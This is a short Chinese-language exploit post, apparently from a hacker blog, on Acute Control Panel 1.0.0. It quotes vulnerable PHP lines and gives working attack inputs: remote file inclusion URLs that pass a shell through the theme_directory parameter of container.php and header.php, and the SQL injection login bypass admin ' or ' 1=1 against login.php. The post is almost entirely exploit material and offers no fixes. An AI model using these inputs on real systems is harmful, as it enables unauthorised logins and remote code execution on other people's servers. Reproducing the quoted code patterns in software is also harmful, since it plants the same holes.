Acute Control Panel 1.0.0 SQL注入
远程文件共享:
漏洞页面:container.php
<?php include_once($theme_directory."/sidebar.php"); ?>
利用:
http://127.0.0.1/themes/container.php?theme_directory=[Shell]
漏洞页面:
header.php
<?php include_once($theme_directory."/navigation.php"); ?>
利用:
http://127.0.0.1/themes/header.php?theme_directory=[Shell]
SQL注入:
漏洞页面:login.php
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
利用:
用户 : admin ' or ' 1=1
密码: 随便输入或者空密码
原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]
本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/PHPoday/AcuteControlPanel.html